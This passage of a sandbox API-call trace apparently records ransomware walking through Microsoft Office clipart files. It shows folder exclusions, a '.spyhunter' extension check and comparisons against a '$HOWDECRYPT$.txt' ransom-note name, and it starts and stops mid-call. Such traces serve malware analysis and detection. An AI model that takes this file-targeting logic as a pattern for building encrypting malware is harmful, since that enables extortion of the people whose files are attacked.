(lpString1="DD01146_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.206] lstrcmpW (lpString1="DD01146_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.207] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 67 [0097.207] GetProcessHeap () returned 0x2c0000 [0097.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2eab8 [0097.207] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b18) returned 0x2c310e0 [0097.207] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.207] lstrcmpiW (lpString1="DD01151_.WMF", lpString2="Windows") returned -1 [0097.207] lstrlenW (lpString="Windows") returned 7 [0097.207] lstrcmpiW (lpString1="DD01151_.WMF", lpString2="$Recycle.bin") returned 1 [0097.207] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.207] lstrcmpiW (lpString1="DD01151_.WMF", lpString2="System Volume Information") returned -1 [0097.207] lstrlenW (lpString="System Volume Information") returned 25 [0097.207] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 67 [0097.207] StrStrIW (lpFirst="DD01151_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.207] lstrcmpW (lpString1="DD01151_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.207] lstrcmpW (lpString1="DD01151_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.207] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 67 [0097.207] GetProcessHeap () returned 0x2c0000 [0097.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2eb88 [0097.207] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b20) returned 0x2c310e0 [0097.207] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.207] lstrcmpiW (lpString1="DD01152_.WMF", lpString2="Windows") returned -1 [0097.207] lstrlenW (lpString="Windows") returned 7 [0097.207] lstrcmpiW (lpString1="DD01152_.WMF", lpString2="$Recycle.bin") returned 1 [0097.207] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.207] lstrcmpiW (lpString1="DD01152_.WMF", lpString2="System Volume Information") returned -1 [0097.207] lstrlenW (lpString="System Volume Information") returned 25 [0097.207] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 67 [0097.207] StrStrIW (lpFirst="DD01152_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.207] lstrcmpW (lpString1="DD01152_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.208] lstrcmpW (lpString1="DD01152_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.208] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 67 [0097.208] GetProcessHeap () returned 0x2c0000 [0097.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2ec58 [0097.208] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b28) returned 0x2c310e0 [0097.208] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.208] lstrcmpiW (lpString1="DD01157_.WMF", lpString2="Windows") returned -1 [0097.208] lstrlenW (lpString="Windows") returned 7 [0097.208] lstrcmpiW (lpString1="DD01157_.WMF", lpString2="$Recycle.bin") returned 1 [0097.208] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.208] lstrcmpiW (lpString1="DD01157_.WMF", lpString2="System Volume Information") returned -1 [0097.208] lstrlenW (lpString="System Volume Information") returned 25 [0097.208] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 67 [0097.208] StrStrIW (lpFirst="DD01157_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.208] lstrcmpW (lpString1="DD01157_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.208] lstrcmpW (lpString1="DD01157_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.208] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 67 [0097.208] GetProcessHeap () returned 0x2c0000 [0097.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2ed28 [0097.208] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b30) returned 0x2c310e0 [0097.208] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.208] lstrcmpiW (lpString1="DD01160_.WMF", lpString2="Windows") returned -1 [0097.208] lstrlenW (lpString="Windows") returned 7 [0097.208] lstrcmpiW (lpString1="DD01160_.WMF", lpString2="$Recycle.bin") returned 1 [0097.208] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.208] lstrcmpiW (lpString1="DD01160_.WMF", lpString2="System Volume Information") returned -1 [0097.208] lstrlenW (lpString="System Volume Information") returned 25 [0097.208] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 67 [0097.209] StrStrIW (lpFirst="DD01160_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.209] lstrcmpW (lpString1="DD01160_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.209] lstrcmpW (lpString1="DD01160_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.209] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 67 [0097.209] GetProcessHeap () returned 0x2c0000 [0097.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2edf8 [0097.209] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b38) returned 0x2c310e0 [0097.209] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.209] lstrcmpiW (lpString1="DD01162_.WMF", lpString2="Windows") returned -1 [0097.209] lstrlenW (lpString="Windows") returned 7 [0097.209] lstrcmpiW (lpString1="DD01162_.WMF", lpString2="$Recycle.bin") returned 1 [0097.209] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.209] lstrcmpiW (lpString1="DD01162_.WMF", lpString2="System Volume Information") returned -1 [0097.209] lstrlenW (lpString="System Volume Information") returned 25 [0097.209] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 67 [0097.209] StrStrIW (lpFirst="DD01162_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.209] lstrcmpW (lpString1="DD01162_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.209] lstrcmpW (lpString1="DD01162_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.209] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 67 [0097.209] GetProcessHeap () returned 0x2c0000 [0097.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2eec8 [0097.209] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b40) returned 0x2c310e0 [0097.209] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.209] lstrcmpiW (lpString1="DD01163_.WMF", lpString2="Windows") returned -1 [0097.209] lstrlenW (lpString="Windows") returned 7 [0097.210] lstrcmpiW (lpString1="DD01163_.WMF", lpString2="$Recycle.bin") returned 1 [0097.210] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.210] lstrcmpiW (lpString1="DD01163_.WMF", lpString2="System Volume Information") returned -1 [0097.210] lstrlenW (lpString="System Volume Information") returned 25 [0097.210] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 67 [0097.210] StrStrIW (lpFirst="DD01163_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.210] lstrcmpW (lpString1="DD01163_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.210] lstrcmpW (lpString1="DD01163_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.210] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 67 [0097.210] GetProcessHeap () returned 0x2c0000 [0097.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2ef98 [0097.210] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b48) returned 0x2c310e0 [0097.210] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.210] lstrcmpiW (lpString1="DD01166_.WMF", lpString2="Windows") returned -1 [0097.210] lstrlenW (lpString="Windows") returned 7 [0097.210] lstrcmpiW (lpString1="DD01166_.WMF", lpString2="$Recycle.bin") returned 1 [0097.210] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.210] lstrcmpiW (lpString1="DD01166_.WMF", lpString2="System Volume Information") returned -1 [0097.210] lstrlenW (lpString="System Volume Information") returned 25 [0097.210] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 67 [0097.210] StrStrIW (lpFirst="DD01166_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.210] lstrcmpW (lpString1="DD01166_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.211] lstrcmpW (lpString1="DD01166_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.211] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 67 [0097.211] GetProcessHeap () returned 0x2c0000 [0097.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2f068 [0097.211] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b50) returned 0x2c310e0 [0097.211] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.211] lstrcmpiW (lpString1="DD01167_.WMF", lpString2="Windows") returned -1 [0097.211] lstrlenW (lpString="Windows") returned 7 [0097.211] lstrcmpiW (lpString1="DD01167_.WMF", lpString2="$Recycle.bin") returned 1 [0097.211] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.211] lstrcmpiW (lpString1="DD01167_.WMF", lpString2="System Volume Information") returned -1 [0097.211] lstrlenW (lpString="System Volume Information") returned 25 [0097.211] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 67 [0097.211] StrStrIW (lpFirst="DD01167_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.211] lstrcmpW (lpString1="DD01167_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.211] lstrcmpW (lpString1="DD01167_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.211] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 67 [0097.211] GetProcessHeap () returned 0x2c0000 [0097.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2f138 [0097.211] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b58) returned 0x2c310e0 [0097.211] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.211] lstrcmpiW (lpString1="DD01168_.WMF", lpString2="Windows") returned -1 [0097.212] lstrlenW (lpString="Windows") returned 7 [0097.212] lstrcmpiW (lpString1="DD01168_.WMF", lpString2="$Recycle.bin") returned 1 [0097.212] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.212] lstrcmpiW (lpString1="DD01168_.WMF", lpString2="System Volume Information") returned -1 [0097.212] lstrlenW (lpString="System Volume Information") returned 25 [0097.212] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 67 [0097.212] StrStrIW (lpFirst="DD01168_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.212] lstrcmpW (lpString1="DD01168_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.212] lstrcmpW (lpString1="DD01168_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.212] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 67 [0097.212] GetProcessHeap () returned 0x2c0000 [0097.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2f208 [0097.212] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b60) returned 0x2c310e0 [0097.212] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.212] lstrcmpiW (lpString1="DD01169_.WMF", lpString2="Windows") returned -1 [0097.212] lstrlenW (lpString="Windows") returned 7 [0097.212] lstrcmpiW (lpString1="DD01169_.WMF", lpString2="$Recycle.bin") returned 1 [0097.212] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.212] lstrcmpiW (lpString1="DD01169_.WMF", lpString2="System Volume Information") returned -1 [0097.212] lstrlenW (lpString="System Volume Information") returned 25 [0097.212] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 67 [0097.212] StrStrIW (lpFirst="DD01169_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.212] lstrcmpW (lpString1="DD01169_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.213] lstrcmpW (lpString1="DD01169_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.213] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 67 [0097.213] GetProcessHeap () returned 0x2c0000 [0097.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2f2d8 [0097.213] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b68) returned 0x2c310e0 [0097.213] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.213] lstrcmpiW (lpString1="DD01170_.WMF", lpString2="Windows") returned -1 [0097.213] lstrlenW (lpString="Windows") returned 7 [0097.213] lstrcmpiW (lpString1="DD01170_.WMF", lpString2="$Recycle.bin") returned 1 [0097.213] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.213] lstrcmpiW (lpString1="DD01170_.WMF", lpString2="System Volume Information") returned -1 [0097.213] lstrlenW (lpString="System Volume Information") returned 25 [0097.213] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 67 [0097.213] StrStrIW (lpFirst="DD01170_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.213] lstrcmpW (lpString1="DD01170_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.213] lstrcmpW (lpString1="DD01170_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.213] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 67 [0097.213] GetProcessHeap () returned 0x2c0000 [0097.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2f3a8 [0097.213] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b70) returned 0x2c310e0 [0097.213] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.213] lstrcmpiW (lpString1="DD01171_.WMF", lpString2="Windows") returned -1 [0097.213] lstrlenW (lpString="Windows") returned 7 [0097.213] lstrcmpiW (lpString1="DD01171_.WMF", lpString2="$Recycle.bin") returned 1 [0097.213] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.213] lstrcmpiW (lpString1="DD01171_.WMF", lpString2="System Volume Information") returned -1 [0097.214] lstrlenW (lpString="System Volume Information") returned 25 [0097.214] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 67 [0097.214] StrStrIW (lpFirst="DD01171_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.214] lstrcmpW (lpString1="DD01171_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.214] lstrcmpW (lpString1="DD01171_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.214] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 67 [0097.214] GetProcessHeap () returned 0x2c0000 [0097.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2f478 [0097.214] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b78) returned 0x2c310e0 [0097.214] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.214] lstrcmpiW (lpString1="DD01172_.WMF", lpString2="Windows") returned -1 [0097.214] lstrlenW (lpString="Windows") returned 7 [0097.214] lstrcmpiW (lpString1="DD01172_.WMF", lpString2="$Recycle.bin") returned 1 [0097.214] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.214] lstrcmpiW (lpString1="DD01172_.WMF", lpString2="System Volume Information") returned -1 [0097.214] lstrlenW (lpString="System Volume Information") returned 25 [0097.214] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 67 [0097.214] StrStrIW (lpFirst="DD01172_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.214] lstrcmpW (lpString1="DD01172_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.214] lstrcmpW (lpString1="DD01172_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.214] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 67 [0097.214] GetProcessHeap () returned 0x2c0000 [0097.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2f548 [0097.214] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b80) returned 0x2c310e0 [0097.214] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.214] lstrcmpiW (lpString1="DD01173_.WMF", lpString2="Windows") returned -1 [0097.215] lstrlenW (lpString="Windows") returned 7 [0097.215] lstrcmpiW (lpString1="DD01173_.WMF", lpString2="$Recycle.bin") returned 1 [0097.215] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.215] lstrcmpiW (lpString1="DD01173_.WMF", lpString2="System Volume Information") returned -1 [0097.215] lstrlenW (lpString="System Volume Information") returned 25 [0097.215] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 67 [0097.215] StrStrIW (lpFirst="DD01173_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.215] lstrcmpW (lpString1="DD01173_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.215] lstrcmpW (lpString1="DD01173_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.215] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 67 [0097.215] GetProcessHeap () returned 0x2c0000 [0097.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2f618 [0097.215] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b88) returned 0x2c310e0 [0097.215] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.215] lstrcmpiW (lpString1="DD01176_.WMF", lpString2="Windows") returned -1 [0097.215] lstrlenW (lpString="Windows") returned 7 [0097.215] lstrcmpiW (lpString1="DD01176_.WMF", lpString2="$Recycle.bin") returned 1 [0097.215] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.215] lstrcmpiW (lpString1="DD01176_.WMF", lpString2="System Volume Information") returned -1 [0097.215] lstrlenW (lpString="System Volume Information") returned 25 [0097.215] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 67 [0097.215] StrStrIW (lpFirst="DD01176_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.215] lstrcmpW (lpString1="DD01176_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.215] lstrcmpW (lpString1="DD01176_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.215] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 67 [0097.215] GetProcessHeap () returned 0x2c0000 [0097.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2f6e8 [0097.216] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b90) returned 0x2c310e0 [0097.216] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.216] lstrcmpiW (lpString1="DD01178_.WMF", lpString2="Windows") returned -1 [0097.216] lstrlenW (lpString="Windows") returned 7 [0097.216] lstrcmpiW (lpString1="DD01178_.WMF", lpString2="$Recycle.bin") returned 1 [0097.216] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.216] lstrcmpiW (lpString1="DD01178_.WMF", lpString2="System Volume Information") returned -1 [0097.216] lstrlenW (lpString="System Volume Information") returned 25 [0097.216] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 67 [0097.216] StrStrIW (lpFirst="DD01178_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.216] lstrcmpW (lpString1="DD01178_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.216] lstrcmpW (lpString1="DD01178_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.216] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 67 [0097.216] GetProcessHeap () returned 0x2c0000 [0097.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2f7b8 [0097.216] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b98) returned 0x2c310e0 [0097.216] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.218] lstrcmpiW (lpString1="DD01179_.WMF", lpString2="Windows") returned -1 [0097.218] lstrlenW (lpString="Windows") returned 7 [0097.218] lstrcmpiW (lpString1="DD01179_.WMF", lpString2="$Recycle.bin") returned 1 [0097.218] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.218] lstrcmpiW (lpString1="DD01179_.WMF", lpString2="System Volume Information") returned -1 [0097.218] lstrlenW (lpString="System Volume Information") returned 25 [0097.218] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 67 [0097.218] StrStrIW (lpFirst="DD01179_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.218] lstrcmpW (lpString1="DD01179_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.218] lstrcmpW (lpString1="DD01179_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.218] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 67 [0097.218] GetProcessHeap () returned 0x2c0000 [0097.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359cd0 [0097.218] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1b98) returned 0x2c310e0 [0097.218] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.218] lstrcmpiW (lpString1="DD01180_.WMF", lpString2="Windows") returned -1 [0097.218] lstrlenW (lpString="Windows") returned 7 [0097.218] lstrcmpiW (lpString1="DD01180_.WMF", lpString2="$Recycle.bin") returned 1 [0097.218] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.218] lstrcmpiW (lpString1="DD01180_.WMF", lpString2="System Volume Information") returned -1 [0097.218] lstrlenW (lpString="System Volume Information") returned 25 [0097.219] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 67 [0097.219] StrStrIW (lpFirst="DD01180_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.219] lstrcmpW (lpString1="DD01180_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.219] lstrcmpW (lpString1="DD01180_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.219] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 67 [0097.219] GetProcessHeap () returned 0x2c0000 [0097.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2f888 [0097.219] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ba0) returned 0x2c310e0 [0097.219] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.219] lstrcmpiW (lpString1="DD01181_.WMF", lpString2="Windows") returned -1 [0097.219] lstrlenW (lpString="Windows") returned 7 [0097.219] lstrcmpiW (lpString1="DD01181_.WMF", lpString2="$Recycle.bin") returned 1 [0097.219] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.219] lstrcmpiW (lpString1="DD01181_.WMF", lpString2="System Volume Information") returned -1 [0097.219] lstrlenW (lpString="System Volume Information") returned 25 [0097.219] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 67 [0097.219] StrStrIW (lpFirst="DD01181_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.219] lstrcmpW (lpString1="DD01181_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.219] lstrcmpW (lpString1="DD01181_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.219] lstrlenW 